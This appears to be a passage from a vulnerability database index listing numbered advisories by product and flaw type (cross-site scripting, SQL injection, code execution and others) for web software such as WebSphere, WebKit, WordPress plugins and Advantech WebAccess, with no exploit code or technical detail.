[75324] Zingiri Web Shop plugin for WordPress index.php cross-site scripting [75280] Maxxweb CMS anzeigen_neu.php cross-site scripting [75241] ACTi Web Configurator cgi-bin directory traversal [75234] IBM WebSphere Application Server snoop servlet information disclosure [75221] C4B XPhone Unified Communications Web client.aspx cross-site scripting [75179] Zingiri Web Shop plugin for WordPress onecheckout.php cross-site scripting [75178] Zingiri Web Shop plugin for WordPress zing.inc.php cross-site scripting [75153] Mozilla Firefox, Thunderbird, and SeaMonkey WebSocket security bypass [75151] Mozilla Firefox, Thunderbird, and SeaMonkey WebGL.drawElements() information disclosure [75111] School Website Solutions Search and Calendar modules cross-site scripting [75094] WebCalendar index.php code execution [75091] WebCalendar pref.php file include [75086] Cox Web &amp [75065] Vermont Web Design eventdisplay.php SQL injection [75063] Liferay Portal webdav information disclosure [75054] Website Toolbox multiple parameters cross-site scripting [75044] Zingiri Web Shop plugin for WordPress unspecified [75037] IBM SONAS Web GUI and CLI command execution [75036] TwitRocker2 for Android WebView class security bypass [75005] Oracle Sun Products Suite iPlanet Web Server unspecified [75001] Oracle Primavera Web application unspecified [74983] Oracle Siebel Clinical Web UI unspecified [74982] Oracle Siebel Clinical Web UI unspecified [74953] Oracle WebCenter Forms Recognition Designer unspecified [74952] Oracle WebCenter Forms Recognition Designer unspecified [74908] Fastpath WebChat multiple scripts cross-site scripting [74900] IBM WebSphere Application Server plugin-key.kdb spoofing [74883] McAfee Web Gateway HTTP Host security bypass [74786] Cisco IronPort Web Security Appliance fingerprint spoofing [74785] Cisco IronPort Web Security Appliance basicConstraints spoofing [74784] Cisco IronPort Web Security Appliance SSL spoofing [74739] ISPConfig webdav_user_edit.php security bypass [74620] Charles River Web CMS search.php cross-site scripting [74610] IBM Tivoli Directory Server Web Admin Tool cross-site scripting [74606] WebEx Business Suite WRF file buffer overflow [74605] WebEx Business Suite atas32.dll buffer overflow [74604] WebEx Business Suite atdl2006.dll buffer overflow [74596] VitalogyWeb company.php cross-site scripting [74587] FastWeb2 category_id parameter cross-site scripting [74547] TYPO3 Command Line Interface (CLI) information disclosure [74536] WebMatter CMS subcategoria.asp and lista_productos.asp SQL injection [74499] ZyXel GS1510 webctrl.cgi information disclosure [74407] Vitalogyweb CMS company.php SQL injection [74392] FreePBX recordings interface code execution [74321] WebGlimpse DOC directory traversal [74320] WebGlimpse wgarcmin.cgi path disclosure [74317] PHP Web server denial of service [74222] WebGlimpse webglimpse.cgi command execution [74214] Google Chrome webui wek security [74212] Google Chrome WebGL canvas code execution [74197] BebopWeb portfolio-secc.php SQL injection [74194] FastWeb2 cat_prod.php and fw2_landpage.php SQL injection [74184] Webglimpse DOC cross-site scripting [74164] Aruba Remote Access Point interface command execution [74156] CrazyTalk Web Player ActiveX control buffer overflow [74141] Eweb large.php and pages.php scripts SQL injection [74061] Barracuda Web Filter index.cgi cross-site scripting [74044] IBM WebSphere Application Server Integration Solution Console cross-site scripting [74009] McAfee Email and Web Security Appliance and McAfee Email Gateway unspecified information disclosure [74008] McAfee Email and Web Security Appliance and McAfee Email Gateway unspecified directory traversal [74007] McAfee Email and Web Security Appliance and McAfee Email Gateway passwords information disclosure [74006] McAfee Email and Web Security Appliance and McAfee Email Gateway Dashboard session hijacking [74005] McAfee Email and Web Security Appliance and McAfee Email Gateway unspecified cross-site scripting [74004] McAfee Email and Web Security Appliance and McAfee Email Gateway password security bypass [73967] Nor-Rec WebBasic kategori.php SQL injection [73965] Pobol WebBasic resimler.php SQL injection [73937] Apple Safari WebKit security bypass [73926] Aurora WebOPAC MemberDetailsRecovery.aspx SQL injection [73923] Apple Safari WebKit HTTP authentication credentials information disclosure [73897] Drupal UC PayDutchGroup / WebDeal payment module unspecified information disclosure [73896] PROMISE Technology WebPAM index.jsp information disclosure [73895] PROMISE Technology WebPAM userID parameter response splitting [73894] Promise WebPAM ent_i.jsp and sqlrun.jsp SQL injection [73873] Apple iOS WebKit unspecified cross-site scripting [73872] Apple iOS WebKit cross-site scripting [73853] Apple WebKit unspecified code execution [73852] Apple WebKit unspecified code execution [73851] Apple WebKit unspecified code execution [73850] Apple WebKit unspecified code execution [73849] Apple WebKit unspecified code execution [73848] Apple WebKit unspecified code execution [73847] Apple WebKit unspecified code execution [73846] Apple WebKit unspecified code execution [73845] Apple WebKit unspecified code execution [73844] Apple WebKit unspecified code execution [73843] Apple WebKit unspecified code execution [73842] Apple WebKit unspecified code execution [73841] Apple WebKit unspecified code execution [73840] Apple WebKit unspecified code execution [73839] Apple WebKit unspecified code execution [73838] Apple WebKit unspecified code execution [73837] Apple WebKit unspecified code execution [73836] Apple WebKit unspecified code execution [73835] Apple WebKit unspecified code execution [73834] Apple WebKit unspecified code execution [73833] Apple WebKit unspecified code execution [73832] Apple WebKit unspecified code execution [73831] Apple WebKit unspecified code execution [73830] Apple WebKit unspecified code execution [73829] Apple WebKit unspecified code execution [73828] Apple WebKit unspecified code execution [73827] Apple WebKit unspecified code execution [73826] Apple WebKit unspecified code execution [73825] Apple WebKit unspecified code execution [73824] Apple WebKit unspecified code execution [73823] Apple WebKit unspecified code execution [73822] Apple WebKit unspecified code execution [73821] Apple WebKit unspecified code execution [73820] Apple WebKit unspecified code execution [73819] Apple WebKit unspecified code execution [73818] Apple WebKit unspecified code execution [73817] Apple WebKit unspecified code execution [73816] Apple WebKit unspecified code execution [73815] Apple WebKit unspecified code execution [73814] Apple WebKit unspecified code execution [73813] Apple WebKit unspecified code execution [73812] Apple WebKit unspecified code execution [73811] Apple WebKit unspecified code execution [73810] Apple WebKit unspecified code execution [73809] Apple WebKit unspecified code execution [73808] Apple WebKit unspecified code execution [73807] Apple WebKit unspecified code execution [73805] Apple WebKit unspecified code execution [73804] Apple WebKit unspecified code execution [73803] Apple WebKit unspecified code execution [73802] Apple WebKit unspecified code execution [73801] Apple WebKit unspecified code execution [73800] Apple WebKit unspecified code execution [73799] Apple WebKit unspecified code execution [73798] Apple WebKit unspecified code execution [73797] Apple WebKit unspecified code execution [73796] Apple WebKit unspecified code execution [73795] Apple WebKit unspecified code execution [73794] Apple WebKit unspecified code execution [73793] Apple WebKit unspecified code execution [73792] Apple WebKit unspecified code execution [73791] Apple WebKit unspecified code execution [73790] Apple WebKit unspecified code execution [73789] Apple WebKit unspecified code execution [73788] Apple WebKit unspecified code execution [73784] PROMISE Technology WebPAM ent_i.jsp cross-site scripting [73779] Webform module for Drupal unspecified cross-site scripting [73774] Apple WebKit multiple cross-site scripting [73766] Apple iTunes WebKit memory code execution [73765] Apple iTunes WebKit memory code execution [73764] Apple iTunes WebKit memory code execution [73763] Apple iTunes WebKit memory code execution [73762] Apple iTunes WebKit memory code execution [73753] Splunk Web unspecified cross-site scripting [73749] IBM WebSphere Application Server SSLClientAuth security bypass [73748] IBM WebSphere Application Server Administration Console cross-site scripting [73738] Webfolio CMS multiple parameters cross-site scripting [73737] JH webstudio article.php cross-site scripting [73689] BlackBerry smartphones and the BlackBerry PlayBook tablet Webkit code execution [73627] Apple Safari WebKit font-face code execution [73575] Webfolio CMS Add Administrator and Modify Web Page cross-site request forgery [73553] Cisco Wireless LAN Controller WebAuth denial of service [73509] Webgrind index.php file include [73485] Webglimpse wgarcmin.cgi cross-site scripting [73484] Webglimpse wgarcmin.cgi unauthorized access [73451] SAP NetWeaver com.sap.aii.mdt.amt.web.AMTPageProcessor information disclosure [73401] WebTriad municipios.php SQL injection [73400] WebsiteBaker CMS Referer HTTP header cross-site scripting [73394] Fork CMS Delete Users or Web Pages cross-site request forgery [73392] BroadWin and Advantech WebAccess unspecified cross-site request forgery [73391] BroadWin and Advantech WebAccess URL SQL injection [73385] WebcamXP and Webcam directory traversal [73381] Unity Web Player 3D files buffer overflow [73376] IBM WebSphere Lombardi Edition coach cross-site scripting [73347] Invision Power Board interface cross-site scripting [73337] Webgrind index.php cross-site scripting [73334] Abbott Web Experts detail.php SQL injection [73333] Rocketwebco story.php SQL injection [73328] WebsiteBaker index.php and forgot.php cross-site scripting [73316] D-Link DSL-2640B interface cross-site request forgery [73284] BroadWin and Advantech WebAccess unspecified SQL injection [73283] BroadWin and Advantech WebAccess ActiveX control buffer overflow [73282] BroadWin and Advantech WebAccess message format string [73281] BroadWin and Advantech WebAccess stream code execution [73280] BroadWin and Advantech WebAccess bwview.asp cross-site scripting [73279] BroadWin and Advantech WebAccess bwerrdn.asp cross-site scripting [73278] BroadWin and Advantech WebAccess unspecified SQL injection [73277] BroadWin and Advantech WebAccess file code execution [73276] BroadWin and Advantech WebAccess unspecified buffer overflow [73275] BroadWin and Advantech WebAccess ActiveX control buffer overflow [73274] BroadWin and Advantech WebAccess GbScriptAddUp.asp code execution [73273] BroadWin and Advantech WebAccess uaddUpAdmin.asp security bypass [73272] BroadWin and Advantech WebAccess opcImg.asp buffer overflow [73271] BroadWin and Advantech WebAccess URL security bypass [73270] BroadWin and Advantech WebAccess URL information disclosure [73269] BroadWin and Advantech WebAccess unspecified cross-site request forgery [73268] BroadWin and Advantech WebAccess unspecified SQL injection [73267] BroadWin and Advantech WebAccess unspecified cross-site scripting [73264] Imperva SecureSphere Web Application Firewall unspecified cross-site scripting [73243] Citrix XenServer Web Self Service unspecified [73188] Oracle Java SE Java Runtime Environment Java Web Start code execution [73181] Cisco IronPort Encryption Appliance interface cross-site scripting [73154] STHS Web Portal prospects.php and team.php SQL injection [73098] BroadWin and Advantech WebAccess RPC code execution [73012] PHP-Fusion weblink_id parameter SQL injection [72986] Siemens Simatic WinCC HMI web server and runtime loader code execution [72965] TYPO3 Webservices Extension unspecified code execution [72941] JBoss Web server character denial of service [72913] Sphinix Software Mobile Web Server comment parameter cross-site scripting [72902] Apple OS X Server WebDAV code execution [72885] Microsoft SharePoint themeweb.aspx cross-site scripting [72878] FishEye and Crucible Webwork 2 framework code injection [72819] Maxxweb CMS news_view.php3 SQL injection [72776] Ada Web Server hash denial of service [72768] xClick Cart webscr.php cross-site scripting [72739] Gekko Web Builder index.php cross-site scripting [72712] NX Web Companion applet code execution [72697] Stoneware webNetwork 6 unspecified SQL injection [72683] Stoneware webNetwork 6 pinEditor.jsp cross-site scripting [72682] Stoneware webNetwork 6 resetPasswordOptions.jsp cross-site request forgery [72640] WordPress AllWebMenus Plugin actions.php file upload [72636] Savant Web Server buffer overflow [72606] WAGO interface information disclosure [72597] Rockwell Automation ControlLogixinterface control commands denial of service [72594] Koyo ECOM100 Ethernet Module Web server denial of service [72581] IBM WebSphere Application Server Virtual Member Manager weak security [72572] Horde Groupware Webmail Edition Horde_Form page cross-site scripting [72563] WebCalendar location parameter cross-site scripting [72477] Oracle Fusion Middleware WebLogic Server component unspecified [72476] Oracle Fusion Middleware WebCenter Content component unspecified [72475] Oracle Fusion Middleware WebCenter Content component unspecified [72474] Oracle Fusion Middleware WebLogic Server component denial of service [72473] Oracle Fusion Middleware Web Services Manager component information disclosure [72472] Oracle Fusion Middleware Web Services Manager component denial of service [72471] Oracle Fusion Middleware Web Services Manager component unspecified [72470] Oracle Fusion Middleware WebCenter Content component unspecified [72445] IBM WebSphere Application Server default messaging component information disclosure [72439] EMC SourceOne Web Search information disclosure [72427] NeoAxis Game Engine neoaxis_web_application_win32.zip directory traversal [72415] PHP Ringtone Website ringtoes.php cross-site scripting [72406] WebTitan Appliance multiple parameters cross-site scripting [72397] XAMPP WebDAV default password [72343] GoAhead WebServer dhttpd denial of service [72342] GoAhead WebServer HTTP denial of service [72339] CoDeSys CmbWebserver.dll directory traversal [72336] IBM WebSphere Application Server web messaging cross-site scripting [72298] IBM WebSphere Application Server Java hash data structure denial of service [72244] Splunk Splunkd web API directory traversal [72237] IpTools mini WebServer directory traversal [72231] MangosWeb Enhanced index.php SQL injection [72167] @Mail Webmail EMail and Calender module cross-site scripting [72157] TinyWebGallery filefunctions.inc and ifo.php command execution [72148] EasyWebRealEstate listings.php and index.php SQL injection [72138] HServer webserver directory traversal [72115] IBM Web Experience Factory text INPUT element and TEXTAREA element cross-site scripting [72087] Splunk Web mappy.py code execution [72036] Webboard Default.asp SQL injection [71963] Public Knowledge Project administrative interface multiple applications file upload [71962] Public Knowledge Project administrative interface multiple applications cross-site request forgery [71959] cApexWEB capexweb.parentvalidatepassword SQL injection [71888] WebSVN path parameter cross-site scripting [71882] Capexweb login module SQL injection [71851] Websense unspecified command execution [71850] Websense unspecified cross-site scripting [71848] Websense unspecified security bypass [71823] Splunk Web unspecified cross-site request forgery [71822] Splunk Web unspecified cross-site scripting [71820] i4Style webpage.php cross-site scripting [71819] i4Style Web Design webpage.php SQL injection [71787] Barracuda Web Filter multiple components cross-site scripting [71760] Opera Web Workers denial of service [71747] WebApps multiple SQL injection [71744] phpWebSite unspecified cross-site scripting [71736] Apple Safari WebKit cache information disclosure [71712] FFFTP WebDAV or SMB code execution [71710] Moodle Web services authentication bypass [71699] Linux Kernel bridge networking interface multiple denial of service [71654] Apache Struts interfaces security bypass [71597] Drupal Webform Validation module unspecified cross-site scripting [71535] CoDeSys CmpWebServer weak security [71534] CoDeSys CmpWebServer HTTP denial of service [71533] CoDeSys CmpWebServer denial of service [71532] CoDeSys CmpWebServer buffer overflow [71504] Multiple Schneider Electric products Web portal directory traversal [71465] libsocialweb Non-SSL man-in-the-middle [71453] Siemens Simatic WinCC miniweb.exe denial of service [71452] Siemens Simatic WinCC miniweb.exe directory traversal [71410] webERP phpinfo.php information disclosure [71409] webERP reportid parameter SQL injection [71408] webERp multiple scripts cross-site scripting [71339] InduSoft Web Studio CEServer.exe security bypass [71337] Webistry CMS index.php SQL injection [71336] IBM WebSphere MQ control commands denial of service [71324] InduSoft Web Studio CEServer component buffer overflow [71319] IBM WebSphere Application Server WS-Security enabled JAX-WS application weak security [71315] IcedTea-Web Plugin SOP security bypass [71307] SAP Netweaver Virus Scan Interface cross-site scripting [71305] WebObjects unspecified cross-site scripting [71285] Zingiri Web Shop plugin for WordPress selectedDoc[] code execution [71246] WebDirector loginAdmin c_secureLogin.jsp and c_tslogin.jsp SQL injection [71245] Webform CiviCRM Integration module for Drupal unspecified SQL injection [71242] ALFContact component for Joomla! contact web form page cross-site scripting [71232] Spectrum Software WebManager CMS pojam parameter cross-site scripting [71230] IBM Websphere Application Server iscdeploy script insecure permissions [71201] Mozilla Firefox and Thunderbird WebGL information disclosure [71171] CmyDocument CMS myDoclist.asp and myWebDoclist.asp SQL injection [71131] Web File Browser webFileBrowser.php directory traversal [71114] GE Proficy Historian Web Administrator query string parameter cross-site scripting [71081] Attraction Website Design event.php SQL injection [71075] HP OpenView Network Node Manager webappmon.exe buffer overflow [71033] Kent Web Forum multiple cross-site scripting [71026] IBM TS3100 and TS3200 Tape Library Express Web management console authentication bypass [71025] RoundCube Webmail URI denial of service [71005] IBM WebSphere ILOG Rule Team Server error.jsp cross-site scripting [70992] Trend Micro InterScan Web Security Suite patchCmd privilege escalation [70980] Cisco WebEx Player ATAS32.DLL buffer overflow [70979] Cisco WebEx Player .wrf file buffer overflow [70967] Google Chrome Web Audio buffer overflow [70883] Red Hat Linux Kernel bridge interface denial of service [70816] Oracle Sun Glassfish Communications Server, GlassFish Enterprise Server, Sun Java System Application Server Web Container unspecified [70798] Oracle Fusion Middleware Oracle Web Services Manager WSM Console unspecified [70794] Oracle Siebel CRM Siebel Core - UIF Client User Interface unspecified [70781] Oracle Fusion Middleware Oracle WebLogic Server Web Services unspecified [70779] Oracle Fusion Middleware Oracle WebLogic Server WLS Security unspecified [70762] Oracle Fusion Middleware Oracle WebLogic Portal - unspecified [70761] Oracle Fusion Middleware Oracle Web Services Manager WSM Console unspecified [70756] Django web-server cross-site request forgery [70675] 111WebCalendar unspecified path disclosure [70564] WebKit DOM windows cross-site scripting [70518] Apple iTunes WebKit memory code execution [70507] Apple iTunes memory WebKit code execution [70502] Apple iTunes unspecified WebKit code execution [70496] Apple iTunes WebKit code execution [70467] Kent Web Forum unspecified cross-site scripting [70456] atvise webMI2ADS Content-Length denial of service [70455] atvise webMI2ADS shutdown denial of service [70453] atvise webMI2ADS unspecified directory traversal [70420] Xerox ColorQube interface security bypass [70413] radvd set_interface_var() file create symlink [70365] TinyWebGallery unspecified path disclosure [70361] WebCalendar unspecified path disclosure [70360] WeBid unspecified path disclosure [70359] WEBinsta mailing list manager unspecified path disclosure [70358] Website Baker unspecified path disclosure [70323] Google Website Optimizer component for Joomla! pggwob page cross-site scripting [70293] SonicWALL NSA admin interface cross-site scripting [70278] OfficeWatch web server directory traversal [70276] QtWeb Browser URL spoofing [70207] WordPress Web Minimalist 200901 Theme index.php cross-site scripting [70168] WebSphere Application Server JSF application information disclosure [70092] openEngine website.php SQL injection [70026] IceWarp Web Mail phpinfo() information disclosure [70025] IceWarp Web Mail XML information disclosure [69938] Evidalia Web SL categoria.php SQL injection [69934] Zingiri Web Shop plugin for WordPress wpabspath file include [69929] AllWebMenus Plugin for WordPress actions.php remote file include [69914] JlWeb index.php SQL injection [69875] Google Chrome WebSockets denial of service [69855] SAP Netweaver com.sap.ipc.webapp.ipcpricing information disclosure [69851] Minimax productsinfo.php and webShow.php SQL injection [69845] DivX Plus Web Player DivXPlaybackModule.dll buffer overflow [69838] IBM WebSphere Commerce Activity Token unspecified [69835] Palm Pre WebOS LunaSysMgr denial of service [69833] SAP Netweaver WEBRFC ICF cross-site scripting [69731] IBM WebSphere Application Server Installation Verification Tool servlet (IVT) cross-site scripting [69670] WebEmlak Real Estate index.php cross-site scripting [69657] Babelweb groups privilege escalation [69656] IBM WebSphere Application Server HTTP Server documentation cross-site scripting [69646] WebsiteBaker CMS unspecified cross-site scripting [69592] TOWeb TOWeb.MO denial of service [69572] eBuddy Web Messenger messaging function cross-site scripting [69566] mWebnet login.asp SQL injection [69554] BroadWin WebAccess Client ActiveX control code execution [69553] BroadWin WebAccess Client ActiveX control code execution [69552] BroadWin WebAccess Client ActiveX control format string [69544] WebProfessional default.php SQL injection [69542] TinyWebGallery tfu_213.swf SQL injection [69541] TinyWebGallery tfu_213.swf, tfu_upload.php and tfu_login.php file include [69502] IBM WebSphere Application Server Community Edition Tomcat unspecified [69484] phpWebSite mod.php SQL injection [69480] Babelweb user privilege escalation [69473] IBM WebSphere Application Server administration console directory traversal [69448] Webkit unspecified memory code execution [69442] HP SiteScope interface security bypass [69359] Web Solutions WCS2U id parameter SQL injection [69316] RoundCube Webmail _mbox parameter cross-site scripting [69305] Code Widget Online Job Application Web App (ASP) admin.asp SQL injection [69259] phpWebSite mod.php cross-site scripting [69252] Website Baker upload.php file upload [69225] Mozilla Firefox, Thunderbird, and SeaMonkey WebGL buffer overflow [69220] Mozilla Firefox, Thunderbird, and SeaMonkey WebGL code execution [69168] Novell Data Synchronizer WebAdmin unauthorized access [69123] HP webOS unspecified cross-site scripting [69122] HP webOS unspecified cross-site scripting [69059] Novell Data Synchronizer Web Admin session hijacking [69040] IBM WebSphere Service Registry and Repository agentDetect.jsp cross-site scripting [69028] iWebkit module for Drupal cross-site scripting [68878] MinaliC Webserver file.php source code disclosure [68876] MyWebServer unspecified denial of service [68824] Microsoft Windows Remote Desktop Web Access privilege escalation [68798] Recipes Website viewRecipe.php SQL injection [68790] IcedTea6 and IcedTea-Web JNLP security bypass [68789] IcedTea6 and IcedTea-Web JNLP information disclosure [68738] Cisco SA 500 Series Security Appliances interface command execution [68713] Apple Safari WebKit unspecified code execution [68712] Apple Safari WebKit libxslt code execution [68711] Apple Safari WebKit unspecified code execution [68710] Apple Safari WebKit unspecified code execution [68709] Apple Safari WebKit SVG markers code execution [68708] Apple Safari WebKit unspecified code execution [68707] Apple Safari WebKit element code execution [68706] Apple Safari WebKit NamedNodeMap::setAttributes code execution [68705] Apple Safari WebKit unspecified code execution [68704] Apple Safari WebKit RSS information disclosure [68703] Apple Safari WebKit embedded username cross-site scripting [68701] Apple Safari WebKit unspecified code execution [68700] Apple Safari WebKit unspecified code execution [68699] Apple Safari WebKit unspecified code execution [68698] Apple Safari WebKit unspecified code execution [68697] Apple Safari WebKit unspecified code execution [68696] Apple Safari WebKit FrameOwner code execution [68695] Apple Safari WebKit styles code execution [68694] Apple Safari WebKit unspecified code execution [68693] Apple Safari WebKit unspecified code execution [68692] Apple Safari WebKit .svg file code execution [68691] Apple Safari WebKit unspecified code execution [68689] Apple Safari WebKit unspecified code execution [68688] Apple Safari AutoFill web forms information disclosure [68594] Inscribe Webmedia news_body.php SQL injection [68585] IBM Tivoli Directory Server IDSWebApp information disclosure [68575] Auto Web Toolbox details.php SQL injection [68571] WebSphere Application Server Administration Console information disclosure [68570] WebSphere Application Server logoutExitPage parameter security bypass [68484] IBM Rational DOORS Web Access [68471] Mozilla Firefox WebGL information disclosure [68470] Google Chrome WebGL information disclosure [68463] Opera unspecified Web page denial of service [68456] Opera unspecified Web page denial of service [68455] Opera unspecified Web page denial of service [68449] Opera Web page denial of service [68439] Opera Web Workers element denial of service [68428] Symantec Web Gateway GUI SQL injection [68417] HP webOS contacts application cross-site scripting [68410] k5n WebCalendar multiple scripts cross-site scripting [68409] foo2zjs getweb symlink [68365] WeBid unspecified SQL injection [68364] WeBid unspecified file include [68363] WeBid converter.php code execution [68352] IBM Rational DOORS Web Access unspecified [68351] IBM Rational DOORS Web Access Server Error responses unspecified [68350] IBM Rational DOORS Web Access unspecified cross-site scripting [68338] IBM Tivoli Directory Server Web Administration Tool information disclosure [68337] IBM WebSphere Portal and IBM Lotus Web Content Management PageBuilder2 theme cross-site scripting [68285] NetServe Web Server mimetypes.html cross-site scripting [68284] NetServe Web Server ssioptions.html cross-site scripting [68268] RealityServer Web Services RTMP denial of service [68235] WebCAT cms_view.php SQL injection [68229] WebSphere MQ CDP extension revocation checking security bypass [68149] H3C ER5100 Router Wen interface authentication bypass [68146] CIDWeb errpage.asp cross-site scripting [68142] Mozilla Firefox WebGL code execution [68141] Mozilla Firefox WebGL denial of service [68140] Mozilla Firefox WebGL security bypass [68105] WeblyGo unspecified cross-site scripting [68104] WeBid newadminuser.php and editadminuser.php cross-site request forgery [68102] Sunway ForceControl WebServer buffer overflow [68100] Hitachi Web Server Directory Indexes denial of service [68081] WeBid error log cross-site scripting [68080] WeBid adsearch.php SQL injection [68075] Mozilla Firefox WebGL information disclosure [68069] IBM Websphere Application Server administrative console cross-site request forgery [67995] WebFileExplorer user SQL injection [67964] Polycom IP Phone interface information disclosure [67944] Microsoft Internet Explorer Web pages information disclosure [67919] Oracle Java Web Start jnlp code execution [67866] IBM Web Content Manager authoring tool security bypass [67849] Simple web-server GET directory traversal [67839] WebSVN dl.php command execution [67807] CodeMeter WebAdmin licenses.html cross-site scripting [67779] Imperva SecureSphere Web Application Firewall Web server cross-site scripting [67768] Anymacro Mail System interface directory traversal [67761] Microsoft XML Editor Web Service Discovery information disclosure [67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting [67735] IBM Web Content Manager (WCM) StackOverflowError exception denial of service [67692] Trustwave WebDefend Enterprise Manager Appliance default account [67687] IBM WebSphere Portal OutputMediator denial of service [67673] AIDeX Mini-WebServer Nickname cross-site scripting [67643] Cisco IOS XR SPA interface denial of service [67628] MidiCMS Website Builder index.php security bypass [67627] MidiCMS Website Builder unspecified cross-site request forgery [67594] IBM WebSphere Portal unspecified cross-site scripting [67563] IBM WebSphere Application Server JAAS security bypass [67562] IBM WebSphere Application Server Administrative Scripting Tools information disclosure [67561] IBM WebSphere Application Server Security privilege escalation [67560] IBM WebSphere Application Server Administrative Console security bypass [67559] IBM WebSphere Application Server IIOP denial of service [67546] Webform module for Drupal unspecified file upload [67545] Webform module for Drupal unspecified cross-site scripting [67536] IBM WebSphere Application Server Service Integration Bus denial of service [67535] IBM WebSphere Application Server messaging engine denial of service [67534] IBM WebSphere Application Server Session Initiation Protocol Proxy denial of service [67533] IBM WebSphere Application Server com.ibm.ws.jsp.runtime.WASJSPStrBufferImpl denial of service [67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service [67531] IBM WebSphere Application Server Security denial of service [67530] IBM WebSphere Application Server Security unauthorized access [67529] IBM WebSphere Application Server AuthCache privilege escalation [67526] IBM WebSphere Application Server SAAJ denial of service [67506] IBM Datacap Taskmaster Capture Web Client Service unspecified [67503] Mitel Audio and Web Conferencing multiple cross-site scripting [67501] Web File Browser file upload [67479] Imperva SecureSphere Web Application Firewall Web requests security bypass [67452] IBM Datacap Taskmaster Capture TMWeb component SQL injection [67430] Google Chrome WebKit glue bad cast execution [67421] Trustwave WebDefend credentials information disclosure [67420] Trustwave WebDefend application server default account [67419] InduSoft Web Studio NTWebServer directory traversal [67390] HP Palm webOS PDK code execution [67381] HP Palm webOS Email application code execution [67357] BlueVoda Website Builder .bvp buffer overflow [67346] phpWebSite upload.php file upload [67317] Apple Safari WebKit address bar spoofing [67278] Horizon Web Builder fshow.php SQL injection [67267] ICONICS WebHMI ActiveX control buffer overflow [67249] Proofpoint Protection Server interface command execution [67248] Proofpoint Protection Server interface SQL injection [67247] Proofpoint Protection Server interface directory traversal [67246] Proofpoint Protection Server interface security bypass [67237] LANSA aXes Web Terminal TN5250 axes_default.css cross-site scripting [67235] WebAuction test.php cross-site scripting [67223] 360 Web Manager CMS assetmanager.php path disclosure [67176] Mozilla Firefox WebGLES buffer overflow [67156] Google Chrome WebSockets code execution [67137] Football Website Manager register.php cross-site scripting [67136] Football Website Manager profile.php SQL injection [67129] up.time interface security bypass [67121] Trustwave WebDefend login account privilege escalation [67115] WebSphere Application Server WS-Security XML encryption weak security [67110] WebSphere Application Server HTTP Trace cross-site scripting [67105] CA Arcot WebFort Versatile Authentication Server Arcot Administrative Console spoofing [67104] CA Arcot WebFort Versatile Authentication Server Arcot Administrative Console cross-site scripting [67102] WebSphere Application Server installer log directory unauthorized access [67077] webERP AccountGroups.php cross-site scripting [67068] Hitachi Web Server request header information disclosure [67067] Hitachi Web Server SSL information disclosure [67048] DynMedia Pro Web CMS downloadfile.php directory traversal [67029] 360 Web Manager CMS assetmanager.php security bypass [67028] 360 Web Manager CMS assetmanager.php file upload [67027] Webmin index.cgi cross-site scripting [67011] Shape Web Solutions CMS imprimir.php SQL injection [67002] web2Project token SQL injection [66999] Asterisk Asterisk Manager Interface command execution [66954] Oracle Sun Java System Access Manager Policy Agent Web Proxy Agent unspecified [66947] Oracle JD Edwards EnterpriseOne Tools and OneWorld Tools Web Runtime SEC multiple cross-site scripting [66930] Oracle E-Business Suite Web ADI component unspecified [66904] CA Output Management Web Viewer UOMWV_Helper ActiveX control buffer overflow [66903] CA Output Management Web Viewer ActiveX control buffer overflow [66888] webSPELL index.php and admincenter.php cross-site scripting [66883] WebKit body code execution [66882] WebKit SVG code execution [66881] WebKit DOM Prototype code execution [66860] WebsiteBaker CMS add.php SQL injection [66847] Microosft Windows WebDAV code execution [66815] RoundCube Webmail login information disclosure [66793] Best Practical Solutions RT search interface information disclosure [66785] WebCalendar login.php cross-site scripting [66770] FiberHome HG-110 Router webproc directory traversal [66769] FiberHome HG-110 Router webproc cross-site scripting [66757] WebJaxe administration.php cross-site request forgery [66684] HP Photosmart Printers webscan information disclosure [66675] Apache Tomcat web.xml security bypass [66654] Cyber-Ark PIM Suite Password Vault Web Access cross-site scripting [66613] RoundCube Webmail modcss.inc security bypass [66588] Horde IMP and Horde Groupware Webmail fetchmailprefs.php cross-site scripting [66578] WebCalendar edit_entry_handler.php cross-site scripting [66536] AR Web Content Manager search.php cross-site scripting [66523] IBM WEBi unknown unspecified [66522] IBM WEBi unspecified cross-site scripting [66516] IBM WebSphere Application Server for z/OS Local OS unauthorized access [66482] Open Ticket Request System CustomerInterface security bypass [66471] Cisco Secure Access Control System interface security bypass [66429] IBM WebSphere DataPower XC10 Appliance denial of service [66382] webEdition index.php file include [66375] A1 Website Download DLL code execution [66372] Easy File Sharing Web Server HTTP directory traversal [66371] Easy File Sharing Web Server UserID security bypass [66370] Easy File Sharing Web Server title or message cross-site scripting [66348] webEdition show.php file include [66347] webEdition multiple scripts cross-site scripting [66340] Open Ticket Request System customer-interface ticket-print dialog information disclosure [66321] wodWebServer.NET GET directory traversal [66286] Ripe Website Manager admin.php cross-site scripting [66285] Ripe Website Manager index.php admin.php SQL injection [66284] Web Wiz Forums multiple SQL injection [66281] Webform Block Module for Drupal cross-site scripting [66272] BroadWin and Advantech webvrpcs.exe privilege escalation [66271] BroadWin and Advantech WebAccess ActiveX control code execution [66237] Web Poll Pro submit.php cross-site scripting [66197] CMS WebManager-Pro index.php security bypass [66196] Open Ticket Request System AgentInterface information disclosure [66152] Fake Webcam .wmv denial of service [66151] ASOC 2200 Web Configurator command execution [66122] CMS WebManager-Pro index.php cross-site scripting [66117] SSWebPlus CMS info_view.php SQL injection [66094] Trend Micro WebReputation filter security bypass [66075] LMS Web Ensino index.php SQL injection [66074] LMS Web Ensino cross-site request forgery [66073] LMS Web Ensino index.php cross-site-scripting [66071] LMS Web Ensino index.php cross-site scripting [66070] LMS Web Ensino cookie session hijacking [66061] Apple Safari WebKit unspecified code execution [66052] Google Chrome WebKit style data code execution [66032] Luch Web Designer page.asp SQL inejction [66019] Maian Weblog index.php SQL injection [66009] Apple Safari WebKit code execution [66007] Apple iOS WebKit unspecified code execution [65999] Apple iOS WebKit HTTP Basic Authentication information disclosure [65992] WebSphere Application Server Installation Verification Tool servlet (IVT) cross-site scripting [65965] Google Chrome WebKit context denial of service [65946] Bacula-Web report.php SQL injection [65944] Bacula-Web report.php cross-site scripting [65930] TL-WR740N Web Console and UPnP denial of service [65871] PyWebDAV MySQLAuthHandler class SQL injection [65856] phpWebSite custom.php cross-site scripting [65844] Apple iTunes WebKit code execution variant 49 [65843] Apple iTunes WebKit code execution variant 48 [65842] Apple iTunes WebKit code execution variant 47 [65841] Apple iTunes WebKit code execution variant 46 [65840] Apple iTunes WebKit code execution variant 45 [65839] 